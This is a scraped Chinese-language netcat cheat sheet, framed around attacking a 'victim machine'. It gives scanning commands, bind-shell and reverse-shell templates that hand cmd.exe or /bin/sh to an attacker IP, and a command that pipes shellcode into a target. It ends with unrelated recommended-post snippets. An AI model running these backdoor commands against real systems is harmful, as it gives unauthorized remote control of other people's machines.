落 憶 無 痕
埠的刺探:
nc -vv ip port
RIVER [192.168.0.198] 19190 (?) open //顯示是否開放open
3.2.掃描器
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
這樣掃描會留下大量的痕跡,在沒掃描器的時候使用。 :)
後門
victim machine: victim(受害者) machine(機器)呵呵我E文不好,標出來自己好認。
nc -l -p port -e cmd.exe //win2000
nc -l -p port -e /bin/sh //unix,linux
attacker machine: //攻擊者的機器.
nc ip -p port //連線victim_IP,然後得到一個shell。
反向連線
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p portattacker machine:
nc -vv -l -p port1 /*用於輸入*/
nc -vv -l -p prot2 /*用於顯示*/
victim machine:
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2 (linux系統使用,不過我還沒有入侵過linux系統,linux學的太差了)
139要加引數-s(nc.exe -L -p 139 -d -e cmd.exe -s 對方機器IP)
這樣就可以保證nc.exe優先於NETBIOS。
埠資料抓包.
nc -vv -w 2 -o test.txt www.xfocus.net 80 21-15
===================================================================================================
'nc.exe -h'即可看到各引數的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d 後臺模式
-e prog 程式重定向,一旦連線,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助資訊
-i secs 延時的間隔
-l 監聽模式,用於入站連線
-L 連線關閉後,仍然繼續監聽
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進位制的傳輸
-p port 本地埠號
-r 隨機本地及遠端埠
-s addr 本地源地址
-t 使用TELNET互動方式
-u UDP模式
-v 詳細輸出--用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉--用於掃描時
埠的表示方法可寫為M-N的範圍格式。
=====================================================================================================
基本用法:
大概有以下幾種用法:
1)連線到REMOTE主機,例子:
格式:nc -nvv 192.168.x.x 80
講解:連到192.168.x.x的TCP80埠
2)監聽LOCAL主機,例子:
格式:nc -l -p 80
講解:監聽本機的TCP80埠
3)掃描遠端主機,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
講解:掃描192.168.x.x的TCP80到TCP445的所有埠
4)REMOTE主機繫結SHELL,例子:
格式:nc -l -p 5354 -t -e c:/winnt/system32/cmd.exe
講解:繫結REMOTE主機的CMDSHELL在REMOTE主機的TCP5354埠
5)REMOTE主機繫結SHELL並反向連線,例子:
格式:nc -t -e c:/winnt/system32/cmd.exe 192.168.x.x 5354
講解:繫結REMOTE主機的CMDSHELL並反向連線到192.168.x.x的TCP5354埠
以上為最基本的幾種用法(其實NC的用法還有很多,
當配合管道命令"|"與重定向命令"<"、">"等等命令功能更強大......)。
=====================================================================================================
高階用法:
6)作攻擊程式用,例子:
格式1:type.exe c:/exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:/exploit.txt
講解:連線到192.168.x.x的80埠,並在其管道中傳送'c:/exploit.txt'的內容(兩種格式確有相同的效果,
真是有異曲同工之妙:P)
附:'c:/exploit.txt'為shellcode等
7)作蜜罐用[1],例子:
格式:nc -L -p 80
講解:使用'-L'(注意L是大寫)可以不停地監聽某一個埠,直到ctrl+c為止
8)作蜜罐用[2],例子:
格式:nc -L -p 80 > c:/log.txt
講解:使用'-L'可以不停地監聽某一個埠,直到ctrl+c為止,同時把結果輸出到'c:/log.txt'中,如果把‘>'
改為‘>>'即可以追加日誌
附:'c:/log.txt'為日誌等
9)作蜜罐用[3],例子:
格式1:nc -L -p 80 < c:/honeypot.txt
格式2:type.exe c:/honeypot.txt|nc -L -p 80
講解:使用'-L'可以不停地監聽某一個埠,直到ctrl+c為止,並把'c:/honeypot.txt'的內容‘送'入其
管道中
相關推薦
落 憶 無 痕
埠的刺探:nc -vv ip portRIVER [192.168.0.198] 19190 (?) open //顯示是否開放open3.2.掃描器nc -vv -w 5 ip port-port portnc -vv -z ip port-port port這樣掃描會留下大量的痕跡,在沒掃描器的時候使用
畢業設計列表--絮落無痕
【018-jsp】M-JSP軍事新聞釋出與管理(SSH)mysql.zip【191-jsp】-線上學習考試系統(ssh)mysql.zip【192-jsp】M-基於JSP的學生考勤管理系統(MySQL版).zip【193-jsp】-問卷調查系統(ssh)(mysql
谷歌Gboard輸入法新增“無痕模式”:僅在Chrome隱身窗口中適用
img width 開發者 安裝 更多 home 版本 但是 並不是 據外媒Android Police報道,如大家所知道的,Chrome瀏覽器中的“隱身模式”是為了防止你的私密瀏覽記錄被其他人看到,但是,在這種模式下,你的輸入法鍵盤依然會記住你輸入的短語,為了阻止你的鍵盤
BZOJ 4011 HNOI2015 落憶楓音 DAG上的dp(實際上重點在於分析)
ora can main span next 暴力 pre -m type 題目鏈接:http://www.lydsy.com/JudgeOnline/problem.php?id=4011 題意概述:給出一張N點的DAG(連通),點1的入度為0。現在加一條原圖沒有的邊
[HNOI2015] 落憶楓音
依次 load 徹底 long long 正是 效應 div 空格 long 題目描述 「恒逸,你相信靈魂的存在嗎?」 郭恒逸和姚楓茜漫步在楓音鄉的街道上。望著漫天飛舞的紅楓,楓茜突然問出這樣一個問題。 「相信吧。不然我們是什麽,一團肉嗎?要不是有靈魂......我們也不可
luogu3244 bzoj4011 HNOI2015 落憶楓音
做出 () 了吧 push AR 選擇 為什麽 成了 之前 這道題目題面真長,廢話一堆。 另外:這大概是我第一道獨立做出來的HNOI2011年以後的題目了吧。像我水平這麽差的都能做出來,dalao您不妨試一下自己想想? 題目大意:給一個DAG,其中1號點沒有入度,現在新
[luogu3244 HNOI2015] 落憶楓音(容斥原理+拓撲排序)
沒有 容斥 mes ont 一行 www 只需要 a* () 傳送門 Description 給你一張?n?個點?m?條邊的DAG,1?號節點沒有入邊。再向這個DAG中加入邊?x→y?,求形成的新圖中以?1?為根的外向樹形圖數 模?10^9+7?。 Input 輸入文件的第
資料採集與埋點簡介之 程式碼埋點、視覺化埋點與無痕埋點
博主做移動手機系統中的資料採集與埋點也有近兩年,那段時間內一方面是集中在具體的開發和問題細節處理,另外一方面則是在把採集系統適配到不同的平臺手機、平板、tv、車載的過程中,有Android和C++兩個版本。有一天見到了“神策資料”的這篇博文,發現總結得太好了,有點相見恨晚的感覺。這篇文章裡面闡述了一
BZOJ4011 HNOI2015落憶楓音(動態規劃+拓撲排序)
DAG中每個點選一條入邊就可以構成一棵有向樹,所以如果沒有環答案就是∏degreei。 考慮去掉含環的答案。可以看做把環縮點,剩下的點仍然可以任意選入邊。於是去除的方案數即為∏degreei/∏degreek,k為環上點。 環相當於考慮新加入邊的終點到起點的所有路徑。設f[i]為i為起點的所有
洛谷3244 落憶楓音 (拓撲圖dp+式子)
題目連結 題目大意就是 給你一個DAG 然後新增一條邊 x − >
2018年10月1日北京班全國中醫診療區域性雕塑美容、減肥 無痕線雕提升術精品班
關於舉辦“全國中醫診療區域性雕塑美容、減肥 無痕線雕提升術精品班”的通知 各級有關醫療機構及從業醫師: 目前中醫鍼灸美容養生、治病調理、減肥等技術風靡全球,效佳安全,符合現代人健康養生美容的理念;但由於很多從業者沒有真正掌握其精髓,而引發市場信任危機;為了進一步
Safari無痕模式下,storage被禁用問題
前言 Safari開啟無痕模式後,localStorage和sessionStorage為空,對其進行set操作也會報錯,也就是說這種情況下,storage是被禁止使用了。接下來說一下解決方法。 解決方案 我們專案框架上的解決方法是對storage進行一層封裝,遇到這種開啟無痕模式的情況,會定義一個wi
【洛谷】P3244 [HNOI2015]落憶楓音
首先沒有環的方案數是很好求的 根據朱劉演算法的推論,一個 DAG 中存在一個點能夠到達每一個點,那麼每個點都選一條入邊一定能構成一個樹型圖(有向樹) 所以DAG可以直接乘法原理 考慮有環的情況 只要將總方案數減去非法方案數就好了 非法方案數是什麼呢 首次加入的
落憶楓音(BZOJ 4011 HNOI2015)
傳送門 Analysis 莫名其妙地被題面虐了一把 很好的一道結論題(?) 由朱劉演算法的推論可知,如果除根節點外每個點都選擇一條入邊,由於沒有環,因此一定會形成一個樹形圖 答案就是∏i=2ndegr
[bzoj4011] [HNOI2015]落憶楓音
題目描述 不妨假設楓葉上有 n個穴位,穴位的編號為 1 ~ n。有若干條有向的脈絡連線著這些穴位。穴位和脈絡組成一個有向無環圖——稱之為脈絡圖(例如圖 1),穴位的編號使得穴位 1 沒有從其他穴位連向它的脈絡,即穴位 1 只有連出去的脈絡;由上面的故事可知,這個有向無環圖存在一個樹形子圖,它是以穴位 1為根
iOS 無痕埋點方案探究
前言 結尾 前言 當前網際網路行業的競爭已經是非常激烈了, “功能驅動”的時代已經過去了, 現在更加註重軟體的細節, 以及使用者的體驗問題。 說到使用者體驗,就不得不提到使用者的操作行為。 在我們的軟體中,我們會到處進行埋點, 以便提
[bzoj4011][DP]落憶楓音
Description 「恆逸,你相信靈魂的存在嗎?」 郭恆逸和姚楓茜漫步在楓音鄉的街道上。望著漫天飛舞的紅楓,楓茜突然問出 這樣一個問題。 「相信吧。不然我們是什麼,一團肉嗎?要不是有靈魂……我們也不可能再見 到你姐姐吧。」 恆逸給出了一個略微無厘頭的回答。楓茜聽後笑
iOS中UITableView在檢視出現時自動滾動到底部(無痕,不閃動)
現在在做一個類似聊天的介面,需求是當進入聊天列表的時候,tableView自動滾動到最後一條聊天記錄。首先,tableView滾動到底部通用的是這兩種方法:1.tableView.setContentOffset(CGPoint(x:0, y:tableView.conten
Safari無痕模式是不能只使用localStorage儲存資料要用Cookie做補丁
safari 無痕瀏覽情況測試(部分手機) 1.測試機型 iPhone7 Plus 版本 11.3 iPhone6 Plus 版本 11.3.1 iPhone6 &nbs
舒夜無痕--成為更好的自己
最近看了一些圖形學的書,對一些牛叉的圖形學研究單位有了一些瞭解。以下列舉一些,排名不分先後。 1、斯坦福大學 斯坦福大學的計算機學院實力毋庸置疑,不要忘了矽谷是怎麼來的。斯坦福大學是最早開始研究計算機的大學之一,於是,它的圖形學實力自然不